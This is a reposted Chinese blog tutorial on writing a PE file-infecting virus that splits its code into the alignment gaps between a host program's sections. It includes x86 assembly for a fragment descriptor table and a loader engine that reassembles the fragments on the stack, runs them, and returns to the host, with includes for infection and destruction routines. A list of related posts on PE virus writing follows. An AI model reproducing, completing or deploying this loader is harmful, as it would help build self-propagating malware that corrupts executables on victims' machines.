关于PE病毒编写的学习(10)——空隙覆盖病毒的实现方法

最新推荐文章于 2023-01-11 21:56:26 发布
转载 最新推荐文章于 2023-01-11 21:56:26 发布 · 613 阅读 · 1

本文深入探讨了病毒如何通过代码分割并注入程序各节空白中运行的机制。包括病毒描述表的建立、初始化引擎设计及逻辑连接方案,详细解释了如何在分散的代码片段间实现完整的病毒功能。

这类病毒名字很多,选这个名字主要是它比较形象说明其感染方式,即将病毒代码分成多份,分别注入到程序各节由于对齐产生的空白中。

 

1.核心——病毒描述表

  将病毒代码分割成多份,分别注入到未知地址的区域内,却能完整运行。这看似神奇,其实实现方法却很简单———建立病毒分割描述表

 

病毒分割描述表举例(汇编):

 

Virus_Distribution struct;病毒片段描述符

   Code_Base     dword  0;该病毒片段的起始地址
   Code_Length  dword  0;该病毒片段的长度
Virus_Distribution ends

 

Distribution_Number=0AH  

  Virus_Distribution<401000h,VirusSize> ;病毒本身第一次编译时,必然和一般程序一样EOP默认是401000h,

                                                               ;长度VirusSize,且没有被分割
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>
  Virus_Distribution<0,0>

 

分析:这里使用固定十组病毒片段描述符,因为PE文件节的个数很少能超过十个。当然也可使用根据文件节数相应调整的描述表,但是这样不但要增加这对病毒描述操作的代码。

 

2.病毒运行方案

   由于代码分成多份,散乱的分布在文件中,怎么能将病毒连接起来运行呢,严格说方法很多,但比较简单可行的有两种方案:

   ①物理连接:建立初始化引擎,申请一块连续的空白区域,把按照病毒描述表所有片段按顺序拷贝到哪里,具体方方法                           

                     CreateFileMappingA,也可抬高堆栈

   ②逻辑连接:建立地址转换引擎,根据病毒描述表进行地址转换,让病毒代码逻辑上认为自己运行在连续的内存区域里

 

   引擎设计的注意的问题:①引擎本身不可被分割,插入时应专门为引擎检查,空白区域是否能完整地容纳下引擎代码。

                                    ②引擎应该尽量小,因为空白区域是由于文件对齐产生的,对齐值默认200H。

 

举例(汇编):

Start:

;病毒初始化引擎////////////////////////////////
Engine_for_Initialization proc
   push ebp
   mov  ebp,esp       
   sub  esp,VirusStackSize;抬高堆栈
   call Initialize_Virus_Code

 Distribution_of_Virus_Code_Table:;病毒代码分布表,使用结构体描述。固定十组,
 Distribution_Offset=$-Start
 Distribution_Number=0Ah
 Virus_Distribution<401000h,VirusSize>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>
 Virus_Distribution<0,0>

Initialize_Virus_Code:
   pop  ebx
   xor  eax,eax
   lea  edi,[esp]

Copy_Next_CodeSection: 
   mov  esi,[ebx+eax*(sizeof Virus_Distribution)]
   and  esi,esi
   jz   Initialize_End
   mov  ecx,[ebx+eax*(sizeof Virus_Distribution)+4] 
Copy_Virus_Code:
   lodsb
   stosb
loop Copy_Virus_Code 
   inc  eax
   cmp  eax,0Ah
   jnz  Copy_Next_CodeSection
   Initialize_End:
;跳转到堆栈中的病毒代码,执行完返回宿主程序原入口点
   mov  eax,esp
   add  eax,VirusEngine_Size
   call eax
;跳转到宿主程序 
  Jmp_Host_File:
   jmp  eax 
Engine_for_Initialization endp
VirusEngine_Size =$-Start

;真正的病毒代码/////////////////////////////////////////////////
VirusCode proc uses ebx ecx edx esi edi
 Include Data_and_Relocation.asm
 Include Infect_HostFile.asm
 Include Destory.asm
 mov  eax,Local_HostFile_OEP
 ret
VirusCode endp
VirusSize =$-Start

结合机器学习和图像处理估算波纹通道中两相流的空隙率matlab实现.zip
06-10
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程...
PE病毒学习资料包
06-08
PE型感染病毒 —— VC源码 PE型感染病毒 —— 遍历磁盘PE文件 (2) PE型感染病毒 —— 遍历磁盘驱动器 (1) PE型感染病毒 —— 增加节点修改PE入口 (3) Win32平台下的PE文件病毒的研究及实现。rar 关于PE病毒编写学习 关于PE病毒编写学习()——定位API的N种方法 关于PE病毒编写学习()——关于PE文件结构操作的程序编写 关于PE病毒编写学习()——重定位的谬误和它的正确写法 关于PE病毒编写学习() 关于PE病毒编写学习()——关于历遍磁盘的讨论 关于PE病毒编写学习()——病毒如何做标记和记录信息 关于PE病毒编写学习
关于PE病毒编写学习(十一)——空隙覆盖病毒实现方法
蛛丝
11-27 2095
这类病毒名字很多,选这个名字主要是它比较形象说明其感染方式,即将病毒代码分成多份,分别注入到程序各节由于对齐产生的空白中。1.核心——病毒描述表  将病毒代码分割成多份,分别注入到未知地址的区域内,却能完整运行。这看似神奇,其实实现方法却很简单———建立病毒分割描述表病毒分割描述表举例(汇编):Virus_Distribution struct;病毒片段描述符   Code_Base     dword  0;该病毒片段的起始地址   Code_Length  dword  0;该病毒片段的长度Virus_
搜寻节空隙感染学习笔记
ProgrammingRing的专栏
11-08 1237
原文:http://www.pediy.com/kssd/index.html -- 病毒技术 -- 病毒知识 -- Anti Virus专题 上面代码中include了VirusLib.asm文件,里面包含了一些病毒中常用函数: ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 测试是否是P
PE文件间隙中加入自己的代码-全程步骤
NewUserBusyCat的专栏
04-21 1925
PE文件的间隙:PE文件在磁盘上存放时其各个节是按页的倍数对齐的(磁盘一页为200h,内存一页为1000h),当一个节不是页的整倍数时其尾部用0填充,这就是PE的间隙。本示例是在.text节加入了可执行代码,在.idata节加入了外部引用函数,在.reloc节加入了重定位地址。本示例MyPE.exe是用VS2008自动生成的SingleWindow样式的程序。为方便理解,附上部分源码:LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wPara
PE 文件病毒编写实验(一)
jmhIcoding
11-09 1万+
这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一下PE的相关。后面 渣电是考上啦,网络安全专业也考上啦,可是大一到大三虽然偶然零零星星地看了一些PE相关的东西,却一直没有集中化的时间来研究PE,因为总是有其它项目找上自己。这个学期刚好有计算机病毒这门
PE文件打补我们都知道在PE文件中有很多空隙,所以我们就有可能给PE文件打补丁.
11-07
PE文件打补,我们都知道在PE文件中有很多空隙,所以我们就有可能给PE文件打补丁. 做法是在空隙中插入我们的补丁代码. 下面我通过实例来教大家给win97的notepad.exe(记事本)程序来打个补 丁,使得notepad.exe运行时先运行我的pach.exe程序,
PE病毒学习笔记——初识感染技术
05-16 1332
说起“感染技术”,一般印象里都是——感染文件,准确说,是“感染可执行文件”。事实上,除了文件感染,也可以是“进程感染”,也就是“进程注入”。但是相比而言,文件感染古老多了——早在单进程环境的DOS下就开始发展,而且相比“进程注入”,在我看来要复杂些。现在我们只考虑Win32环境下的文件感染。毫无疑问,读写文件的过程需要大量使用到API,如果看过我之前的关于“搜索API”的学习笔记的话,那么这个工作
操作系统实现——编写MBR
guicaifjz的博客
10-15 1523
由于MBR是占据了硬盘的第0扇区(以逻辑LBA方式,扇区从0开始编号,若是以物理CHS方式,扇区则从1开始编号),第一扇区是空闲的,可以用,但离得太近了,所以把loader放到第2扇区,MBR从第2扇区中把它读出来,读出来放到哪?第一条指令中的源操作数0x18是立即数,目的操作数ax是寄存器,所以它既是立即数寻址,也是寄存器寻址,第二条指令中,源操作数和目的操作数都是寄存器,所以纯粹是寄存器寻址。0x1234是段偏移地址,默认的段地址是DS,这条指令是将内存地址DS:0x1234处的值写入ax寄存器。
数据库系统实现(第二版)学习笔记——第2章 辅助存储管理器
weixin_40734030的博客
02-18 2019
数据库系统实现(第二版)学习笔记——第2章 辅助存储管理器辅助存储管理器1.存储器层次1.1 存储器层次1.2 在存储器层次建传送数据1.3 易失和非易失存储器1.4 虚拟存储器2.磁盘2.1 磁盘结构2.2 磁盘控制器2.3 磁盘存取特性3.加速对辅助存储器的访问3.1 计算的I/O模型3.2 按柱面组织数据3.3 使用多个磁盘3.4 磁盘镜像3.5 磁盘调度和电梯算法3.6 预取和大规模缓冲4.磁盘故障4.1 间断性故障4.2 校验和4.3 稳定存储 辅助存储管理器 辅助存储管理器:磁盘和其他能够存储大
PE文件病毒实验(二)——实验报告
热门推荐
jmhIcoding
03-01 1万+
实验目的:掌握PE文件格式;理解病毒感染PE文件的原理。 实验内容: (1) 了解PE文件格式。 (2) 根据实验步骤,编程实现PE文件中插入病毒代码。运行插入病毒代码后的PE文件。 (3) 编程实现在磁盘中搜索.exe文件的操作,对于所有的.exe文件插入病毒代码并运行插入病毒代码后的exe文件。 (4) 编程实现在磁盘中搜索(3)中的.exe文件的操作,对于所有的.exe文件删除病毒代码并运...
菜鸟的病毒分析6搜寻节空间感染pe
abcd8080的博客
07-03 218
win32 搜寻节间隙感染pe文件经过上次那个变形pe病毒的洗礼,分析这个终于不那么蛋疼了病毒行为:感染目录下的txt.exe文件 在原程序运行前运行病毒代码 弹出被感染对话框 继续感染其他病毒流程:搜索api 打开文件 内存映射 搜索每一个节 查看节剩余空间能否插入病毒 如果能 更改相关属性 添加病毒文件 关闭文件 完成.text:00401000 ;.text:00401000...
从编程角度揭示病毒感染原理--之乾坤大挪移(PE病毒文件感染原理)
yunyu5120的专栏
12-25 5820
<br />从编程角度揭示病毒感染原理<br />                                                           --之乾坤大挪移(PE病毒文件感染原理)<br />                            作者
学习笔记:病毒感染PE文件的基本方法
编程爱好者
03-13 6013
2007-06-27 02:40 PE病毒常见的感染其它文件方法是在文件中添加一个新节,然后往该节中添加病毒代码和病毒执行后返回HOST程序的代码,并修改文件头中代码开始执行位置(Address Of EntryPoint)指向新添加的病毒节的代码入口,以便程序运行后先执行病毒代码。下面具体分析一下感染文件
学习日记——(计算机病毒PE文件病毒
weixin_54055099的博客
11-22 6640
一、相关知识 PE文件病毒的原理:PE文件病毒感染病毒时,将自身代码复制到目标文件PE文件病毒在目标文件前运行,那么,它是怎么做到的呢? 答:PE病毒感染其他文件的常见方法是: 在文件中添加一个新节,然后把病毒代码和执行后返回宿主程序的代码写入到新添加的节中; 同时修改PE文件头的入口地址,使它指向新添加的病毒代码入口; 这样做后,当程序运行时,首先运行病毒代码,运行完后再转去运行宿主代码。 PE文件病毒的感染过程: 第一种: 判断目标文件开始的两个字节是否为“MZ”; 判断PE文件
PE文件感染程序设计(PE病毒
Zyecho的博客
01-11 4650
记录PE病毒设计的入门实验
Win32 PE病毒原理分析
liwei8703的专栏
12-07 3955
by guojpeng/CVC.GB在绝大多数病毒爱好者眼中,真正的病毒技术在Win32 PE病毒中才会得到真正的体现(令病毒极度疯狂的DOS时代已经过去)。并且要掌握病毒技术的精髓,学会Win32汇编是非常必要的。本节所涉及到的源代码全部采用Win32汇编语言编写。Win32病毒同时也是所有病毒中数量极多,破坏性极大,技巧性最强的一类病毒。譬如FunLove、中国黑客等病毒都是属于这
pe文件上添加执行代码
珍惜
04-20 527
PE文件上添加代码所必须的几个步骤: (1)将添加的代码写到目标PE文件中,这段代码既可以插入原代码所处的节空隙中(由于每个节保存在文件中时是按照FileAlignMenu的值对齐的,所以节的最后必然会有一引动空余的空间),也可以通过添加一个新的节来附在原文件的尾部。 (2)PE文件原来的入口指针必须保存在添加的代码中,这样,这段代码执行完毕以后可以转移到原始文件执行。 (3)PE文件中的入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值